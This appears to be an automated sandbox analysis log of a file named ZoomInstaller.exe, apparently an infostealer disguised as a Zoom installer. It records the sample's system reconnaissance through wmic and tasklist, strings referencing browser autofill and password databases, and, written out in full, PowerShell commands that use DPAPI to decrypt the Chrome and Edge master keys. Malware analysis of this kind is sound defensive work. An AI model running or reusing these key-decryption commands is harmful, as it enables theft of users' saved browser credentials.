    Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
    Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
    Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
    Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002CA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT name, value FROM autofillSELECT name, value FROM autofillPRAGMA busy_timeout = 5000;PRAGMA locking_mode = NORMAL;PRAGMA synchronous = NORMAL;
    Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
    Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
    Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00015D000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1944543316.000002976C7FB000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1944783848.000002976C7FB000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1944945030.000002976C7FB000.00000004.00000020.00020000.00000000.sdmp, passwords.db.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
    Source: ZoomInstaller.exeString found in binary or memory: failed to construct HKDF label: %sCM_Get_Device_Interface_List_SizeWcrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key size2006-01-02T15:04:05.999999999Z07:00unpaired removeDep: no %T dep on %Tencoding/hex: odd length hex string2006-01-02 15:04:05.999999999-07:002006-01-02T15:04:05.999999999-07:00Non-function passed to RegisterFunc'_' must separate successive digitsform-data; name="%s"; filename="%s"http: server closed idle connectionCONTINUATION frame with stream ID 0executable file not found in %PATH%persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=network dropped connection on resettransport endpoint is not connectedhash/crc32: invalid hash state sizeflate: corrupt input before offset 1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9" is unexported but missing PkgPathreflect.MakeSlice of non-slice typemime: bogus characters after %%: %qtoo many Questions to pack (>65535)file type does not support deadlineunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharehpack: invalid Huffman-encoded datadynamic table size update too largeSubscribeServiceChangeNotificationsbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accessmlkem768: invalid ciphertext lengthcrypto/md5: invalid hash state sizeP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferecb85da208ccedcda3abcbadadfb5fb91423cc98009cc670a9423fd9472b78d5727fbdb18cad2624ace4f40c34ea4b25ed4f06096b5e8cbf70c74380253b0ce5babaf95cd02b767d868ff87e042ab8ab4a2ab596c8cb97fa4249cd843fe7bc726f1bef30912dbabb142ff299crypto/cipher: input not full blockscrypto/rand: argument to Int is <= 0name %q does not begin with a lettersql: converting argument %s type: %wconverting NULL to %s is unsupportedjson: encoding error for type %q: %qhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after
    Source: ZoomInstaller.exeString found in binary or memory: failed to construct HKDF label: %sCM_Get_Device_Interface_List_SizeWcrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key size2006-01-02T15:04:05.999999999Z07:00unpaired removeDep: no %T dep on %Tencoding/hex: odd length hex string2006-01-02 15:04:05.999999999-07:002006-01-02T15:04:05.999999999-07:00Non-function passed to RegisterFunc'_' must separate successive digitsform-data; name="%s"; filename="%s"http: server closed idle connectionCONTINUATION frame with stream ID 0executable file not found in %PATH%persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=network dropped connection on resettransport endpoint is not connectedhash/crc32: invalid hash state sizeflate: corrupt input before offset 1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9" is unexported but missing PkgPathreflect.MakeSlice of non-slice typemime: bogus characters after %%: %qtoo many Questions to pack (>65535)file type does not support deadlineunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharehpack: invalid Huffman-encoded datadynamic table size update too largeSubscribeServiceChangeNotificationsbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accessmlkem768: invalid ciphertext lengthcrypto/md5: invalid hash state sizeP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferecb85da208ccedcda3abcbadadfb5fb91423cc98009cc670a9423fd9472b78d5727fbdb18cad2624ace4f40c34ea4b25ed4f06096b5e8cbf70c74380253b0ce5babaf95cd02b767d868ff87e042ab8ab4a2ab596c8cb97fa4249cd843fe7bc726f1bef30912dbabb142ff299crypto/cipher: input not full blockscrypto/rand: argument to Int is <= 0name %q does not begin with a lettersql: converting argument %s type: %wconverting NULL to %s is unsupportedjson: encoding error for type %q: %qhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after
    Source: ZoomInstaller.exeString found in binary or memory: C:/Program Files/Go/src/net/addrselect.go
    Source: ZoomInstaller.exeString found in binary or memory: -stopTimer
    Source: ZoomInstaller.exeString found in binary or memory: -addr
    Source: ZoomInstaller.exeString found in binary or memory: -stop
    Source: unknownProcess created: C:\Users\user\Desktop\ZoomInstaller.exe "C:\Users\user\Desktop\ZoomInstaller.exe"
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_videocontroller get caption
    Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
    Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
    Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Version
    Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
    Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_videocontroller get captionJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get CaptionJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get VersionJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion"Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion"Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
